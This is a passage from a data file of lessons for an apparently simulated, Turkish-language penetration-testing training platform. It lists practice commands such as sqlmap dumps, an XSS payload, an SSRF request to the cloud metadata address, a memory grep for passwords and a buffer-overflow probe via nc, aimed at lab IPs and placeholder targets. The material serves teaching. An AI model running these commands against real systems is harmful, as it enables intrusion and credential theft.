          operatorBrief: 'Yetki yükseltme, tek bir sihirli komut değil zemin analizidir. Bu aşamada amaç root almak değil; hangi izin modelinin yükselme fırsatı doğurduğunu brifing formatında ayıklamaktır.',
          task: 'Sudo yetkilerini ve SUID yüzeyini tarayıp kritik bir ipucunu terminalde görünür hale getir.',
          evidence: ['Komutta `sudo -l` kullanılmalı.', 'Çıktı içinde `NOPASSWD` ya da `/usr/bin/vim` görünmeli.'],
          hints: ['İlk soru: kullanıcı sudo ile ne çalıştırabilir?', 'Sonra SUID yüzeyine bak.', '`sudo -l` ve `find / -perm -4000` kombinasyonu tam brifing verir.'],
          reflection: 'Privilege escalation refleksi, exploit seçmeden önce mekanik avantajları görmekle başlar. Bu görev sana teknik karar vermeden önce yüzeyi okuyup sınıflandırmayı öğretir.',
          validation: [
            { id: 'sudo-list', label: 'Sudo yetki listesi sorgulandı', type: 'commandIncludesAll', values: ['sudo', '-l'] },
            { id: 'sudo-vim', label: '`NOPASSWD` veya `vim` yüzeyi görüldü?', type: 'outputIncludes', values: ['NOPASSWD', '/usr/bin/vim'] },
          ],
        },
      },
      {
        id: 's01-z02',
        title: 'Tcpdump ile trafik okuması',
        description: 'Canlı trafik görüntüsünü yorumlayıp veri akışına dair ilk sinyali yakala.',
        difficulty: 'zor',
        duration: 46,
        mission: {
          objective: 'Paket görüntüsünü olay akışına çevirmek.',
          operatorBrief: 'Trafik analizi, paket saymak değil akış okumaktır. Tcpdump çıktıları sana kim kiminle ne zaman haberleşiyor sorusunun ilk cevabını verir. Bu derste görüntü yerine yorum yapmaya hazır bir olay akışına bakacaksın.',
          task: 'Tcpdump ile trafik yakalamayı başlat ve olası HTTPS akışına dair kanıt topla.',
          evidence: ['Komutta `tcpdump` bulunmalı.', 'Çıktı içinde `10.10.10.1.443` veya `Flags [P.]` benzeri trafik satırı görünmeli.'],
          hints: ['Arayüz belirtmek iyi pratiktir.', 'Port filtresi kullanman mantıklı olabilir.', '`tcpdump -i eth0 -n port 80 or port 443` simüle akışı gösterecektir.'],
          reflection: 'Ağ analistinin olgunluğu, tek satırlık paket kaydını davranışa çevirebilmesidir. Bu görev, görsel arayüze bağımlı kalmadan trafik okuma kasını çalıştırır.',
          validation: [
            { id: 'tcpdump-command', label: '`tcpdump` komutu çalıştırıldı?', type: 'commandIncludesAny', values: ['tcpdump', 'wireshark'] },
            { id: 'tcpdump-output', label: 'Canlı trafik akışından kanıt satırı görüldü?', type: 'outputIncludes', values: ['10.10.10.1.443'] },
          ],
        },
      },
      {
        id: 's01-z03',
        title: 'SSH tunneling zihniyeti',
        description: 'Port forwarding fikrini komut seviyesinde kur ve tünel topolojisini doğrula.',
        difficulty: 'zor',
        duration: 52,
        mission: {
          objective: 'SSH tünelleme komutunu mantıklı parametrelerle kurmak.',
          operatorBrief: 'Port forwarding, bir komut ezberi değil trafik topolojisi düşünmektir. Yerel port, uzak hedef ve erişim zinciri arasındaki ilişkiyi anlamadan tünel kurmak sadece kopyala-yapıştır olur.',
          task: 'Yerel port forward mantığını ifade eden bir ssh komutu kur.',
          evidence: ['Komutta `ssh` ve `-L` birlikte geçmeli.', 'Hedef formatında `user@target` benzeri bir tanım görünmeli.'],
          hints: ['Bu görev gerçek bağlantı değil, doğru komut anatomisini kurmakla ilgilidir.', 'Yerel forward için `-L` kullanılır.', '`ssh -L 8080:localhost:80 user@target` benzeri bir iskelet beklenir.'],
          reflection: 'Tunneling bilgisi, pentestte duvar arkası hizmetlere ulaşmanın temel yoludur. Buradaki kazanım tek komut değil; trafik rotasını zihninde kurabilmektir.',
          validation: [
            { id: 'ssh-forward', label: 'SSH local forwarding komutu kuruldu', type: 'commandIncludesAll', values: ['ssh', '-L'] },
            { id: 'ssh-target', label: 'Komutta hedef kullanıcı ve hedef sistemi tanımlandı', type: 'commandIncludesAny', values: ['user@target', 'user@target.com'] },
          ],
        },
      },
    ],
  },

  {
    id: 'set-02-web',
    title: 'Web Attacks',
    subtitle: 'OWASP Top 10, injection, and web application security',
    icon: 'WEB',
    color: '#f59e0b',
    lessons: [
      // ── KOLAY ──────────────────────────────────────────────────────────────
      {
        id: 's02-k01',
        title: 'HTTP Protokolü Derinlemesine',
        description: 'GET/POST/PUT/DELETE metodları, başlıklar, cookie\'ler, HTTP/HTTPS farkları.',
        difficulty: 'kolay',
        practiceCmd: 'curl -v http://10.10.10.1:80',
        duration: 20,
      },
      {
        id: 's02-k02',
        title: 'Dizin Keşfi — Gobuster',
        description: 'Web dizin ve dosya brute-force. /admin, /backup, /.env gibi hassas dizinleri bul.',
        difficulty: 'kolay',
        practiceCmd: 'gobuster dir http://10.10.10.1',
        duration: 25,
      },
      {
        id: 's02-k03',
        title: 'Temel SQL Injection',
        description: 'OR 1=1-- payloadı, boolean-based SQLi mantığı. Login bypass teknikleri.',
        difficulty: 'kolay',
        practiceCmd: 'sqlmap -u "http://target.com?id=1" --dbs',
        duration: 30,
      },
      {
        id: 's02-k04',
        title: 'Reflected XSS',
        description: '<script>alert(1)</script> temel XSS. Giriş sanitizasyonu eksikliğini tespit et.',
        difficulty: 'kolay',
        practiceCmd: 'curl "http://target.com/search?q=<script>alert(1)</script>"',
        duration: 20,
      },
      // ── ORTA ───────────────────────────────────────────────────────────────
      {
        id: 's02-o01',
        title: 'Burp Suite Intercept',
        description: 'Proxy kurulumu, request yakalama ve değiştirme, Repeater, Intruder modülleri.',
        difficulty: 'orta',
        practiceCmd: 'nikto -h http://10.10.10.1',
        duration: 45,
      },
      {
        id: 's02-o02',
        title: 'Gelişmiş SQLmap',
        description: '--dump, --os-shell, --forms bayrakları. Veritabanı dökümü ve tablo çıkarma.',
        difficulty: 'orta',
        practiceCmd: 'sqlmap -u "http://target.com?id=1" --dump --tables',
        duration: 40,
      },
      {
        id: 's02-o03',
        title: 'CSRF & SSRF Saldırıları',
        description: 'Cross-Site Request Forgery token bypass. Server-Side Request Forgery ile iç ağa erişim.',
        difficulty: 'orta',
        practiceCmd: 'curl -X POST http://target.com/api -d "url=http://169.254.169.254/latest/meta-data/"',
        duration: 40,
      },
      {
        id: 's02-o04',
        title: 'JWT Token Manipülasyonu',
        description: 'JWT yapısı, algorithm confusion (none alg), secret brute-force ve token forgery.',
        difficulty: 'orta',
        practiceCmd: 'curl http://target.com/api/profile -H "Authorization: Bearer eyJ..."',
        duration: 35,
      },
      // ── ZOR ────────────────────────────────────────────────────────────────
      {
        id: 's02-z01',
        title: 'Blind SQLi & Out-of-Band',
        description: 'Zaman tabanlı (time-based) ve boolean-based blind SQLi. DNS exfiltration teknikleri.',
        difficulty: 'zor',
        practiceCmd: "sqlmap -u 'http://target.com?id=1' --technique=T --time-sec=5",
        duration: 70,
      },
      {
        id: 's02-z02',
        title: 'Web Shell Upload & RCE',
        description: 'Dosya yükleme bypass teknikleri, MIME type manipülasyonu, PHP webshell ile RCE.',
        difficulty: 'zor',
        practiceCmd: 'wpscan --url http://target.com --enumerate p,u',
        duration: 60,
      },
      {
        id: 's02-z03',
        title: 'API Güvenliği — BOLA/IDOR',
        description: 'Broken Object Level Authorization. API endpoint fuzzing, parametre manipülasyonu.',
        difficulty: 'zor',
        practiceCmd: 'wfuzz -c -z range,1-100 http://api.target.com/users/FUZZ/profile',
        duration: 65,
      },
    ],
  },

  {
    id: 'set-03-pentest',
    title: 'Penetration Testing',
    subtitle: 'Metasploit, credential attacks, and lateral movement',
    icon: 'RED',
    color: '#ef4444',
    lessons: [
      // ── KOLAY ──────────────────────────────────────────────────────────────
      {
        id: 's03-k01',
        title: 'Metasploit Framework Temelleri',
        description: 'msfconsole, search, use, set RHOSTS, exploit komutları. Temel modül yapısı.',
        difficulty: 'kolay',
        practiceCmd: 'msfconsole',
        duration: 30,
      },
      {
        id: 's03-k02',
        title: 'Hydra ile Kimlik Brute-Force',
        description: 'SSH, FTP, HTTP-form-post servisleri için wordlist saldırısı. RockYou kullanımı.',
        difficulty: 'kolay',
        practiceCmd: 'hydra 10.10.10.1 ssh',
        duration: 25,
      },
      {
        id: 's03-k03',
        title: 'SMB Enumeration',
        description: 'enum4linux ile Windows paylaşımları, kullanıcılar ve grup bilgilerini çekme.',
        difficulty: 'kolay',
        practiceCmd: 'enum4linux 10.10.10.1',
        duration: 20,
      },
      {
        id: 's03-k04',
        title: 'Hash Kırma — Hashcat & John',
        description: 'MD5, NTLM, bcrypt hash türleri. Dictionary attack ve rule-based attack.',
        difficulty: 'kolay',
        practiceCmd: 'hashcat 5f4dcc3b5aa765d61d8327deb882cf99',
        duration: 30,
      },
      // ── ORTA ───────────────────────────────────────────────────────────────
      {
        id: 's03-o01',
        title: 'Meterpreter & Post-Exploitation',
        description: 'Shell upgrade, hashdump, getuid, getsystem. Kalıcılık (persistence) teknikleri.',
        difficulty: 'orta',
        practiceCmd: 'msfvenom',
        duration: 50,
      },
      {
        id: 's03-o02',
        title: 'LLMNR/NBT-NS Poisoning',
        description: 'Responder ile NTLM hash yakalama. Pass-the-Hash ve Relay saldırıları.',
        difficulty: 'orta',
        practiceCmd: 'responder eth0',
        duration: 45,
      },
      {
        id: 's03-o03',
        title: 'Active Directory Temelleri',
        description: 'Kerberoasting, AS-REP Roasting, BloodHound ile AD yol analizi.',
        difficulty: 'orta',
        practiceCmd: 'enum4linux -a 10.10.10.1',
        duration: 55,
      },
      {
        id: 's03-o04',
        title: 'Pivoting & Tünelleme',
        description: 'Ele geçirilen makine üzerinden iç ağa erişim. Chisel, SSH dynamic proxy.',
        difficulty: 'orta',
        practiceCmd: 'ssh -D 1080 user@pivot-host',
        duration: 50,
      },
      // ── ZOR ────────────────────────────────────────────────────────────────
      {
        id: 's03-z01',
        title: 'Buffer Overflow — x86',
        description: 'EIP kontrolü, bad char tespiti, shellcode enjeksiyonu. Vanilla stack overflow.',
        difficulty: 'zor',
        practiceCmd: 'python3 -c \'print("A"*100)\' | nc 10.10.10.1 9999',
        duration: 90,
      },
      {
        id: 's03-z02',
        title: 'Pass-the-Ticket & Golden Ticket',
        description: 'Kerberos bilet manipülasyonu. Impacket araçları ile domain compromise.',
        difficulty: 'zor',
        practiceCmd: 'netcat 10.10.10.1 445',
        duration: 75,
      },
      {
        id: 's03-z03',
        title: 'C2 Framework Operasyonu',
        description: 'Command & Control altyapısı. Beacon yönetimi, opsec güvenli komutlar.',
        difficulty: 'zor',
        practiceCmd: 'msfconsole',
        duration: 80,
      },
    ],
  },

  {
    id: 'set-04-advanced',
    title: 'Advanced Operations',
    subtitle: 'Reverse engineering, malware analysis, and red team',
    icon: 'ADV',
    color: '#7c3aed',
    lessons: [
      // ── KOLAY ──────────────────────────────────────────────────────────────
      {
        id: 's04-k01',
        title: 'Binary Analiz Temelleri',
        description: 'file, strings, xxd ile binary inceleme. ELF/PE format yapısı ve section\'lar.',
        difficulty: 'kolay',
        practiceCmd: 'file /bin/ls && strings /bin/ls | head -20',
        duration: 25,
      },
      {
        id: 's04-k02',
        title: 'OSINT Teknikleri',
        description: 'Shodan, theHarvester, Maltego ile hedef hakkında açık kaynak istihbaratı.',
        difficulty: 'kolay',
        practiceCmd: 'amass enum -d target.com',
        duration: 30,
      },
      {
        id: 's04-k03',
        title: 'Malware Sandbox Analizi',
        description: 'Statik ve dinamik analiz farkı. Any.run, VirusTotal, Cuckoo sandbox kullanımı.',
        difficulty: 'kolay',
        practiceCmd: 'strings malware.exe | grep -E "(http|cmd|powershell)" 2>/dev/null',
        duration: 30,
      },
      // ── ORTA ───────────────────────────────────────────────────────────────
      {
        id: 's04-o01',
        title: 'Ghidra ile Tersine Mühendislik',
        description: 'Decompiler kullanımı, fonksiyon analizi, string referansları, patch etme.',
        difficulty: 'orta',
        practiceCmd: 'ghidra',
        duration: 60,
      },
      {
        id: 's04-o02',
        title: 'GDB ile Dinamik Analiz',
        description: 'Breakpoint, watchpoint, register inceleme. PWNDBG/GEF eklentileri.',
        difficulty: 'orta',
        practiceCmd: 'r2 /bin/ls',
        duration: 55,
      },
      {
        id: 's04-o03',
        title: 'Ağ Tabanlı Malware Tespiti',
        description: 'C2 trafik örüntüleri, beaconing tespiti, DNS tünelleme ve exfiltration imzaları.',
        difficulty: 'orta',
        practiceCmd: 'tcpdump -i eth0 -nn -X port 53',
        duration: 50,
      },
      {
        id: 's04-o04',
        title: 'Cloud Güvenliği — AWS/Azure',
        description: 'S3 bucket misconfiguration, IAM privilege escalation, metadata service saldırıları.',
        difficulty: 'orta',
        practiceCmd: 'curl http://169.254.169.254/latest/meta-data/',
        duration: 50,
      },
      // ── ZOR ────────────────────────────────────────────────────────────────
      {
        id: 's04-z01',
        title: 'Özel Implant Geliştirme',
        description: 'Staged payload mimarisi, AV/EDR evasion teknikleri. OPSEC-safe C2 iletişimi.',
        difficulty: 'zor',
        practiceCmd: 'msfvenom',
        duration: 90,
      },
      {
        id: 's04-z02',
        title: 'Dijital Adli Bilişim — DFIR',
        description: 'Volatility ile memory forensics. Artifacts, timeline analizi, IOC çıkarma.',
        difficulty: 'zor',
        practiceCmd: 'strings /proc/1/mem 2>/dev/null | grep -i "password" | head -5',
        duration: 80,
      },
      {
        id: 's04-z03',
        title: 'Red Team Full-Chain Operasyon',
        description: 'Recon → Initial Access → Persistence → Lateral Movement → Exfil. Gerçekçi senaryo.',
        difficulty: 'zor',
        practiceCmd: 'nmap -sV -sC 10.10.10.1',
        duration: 120,
      },
    ],
  },
]
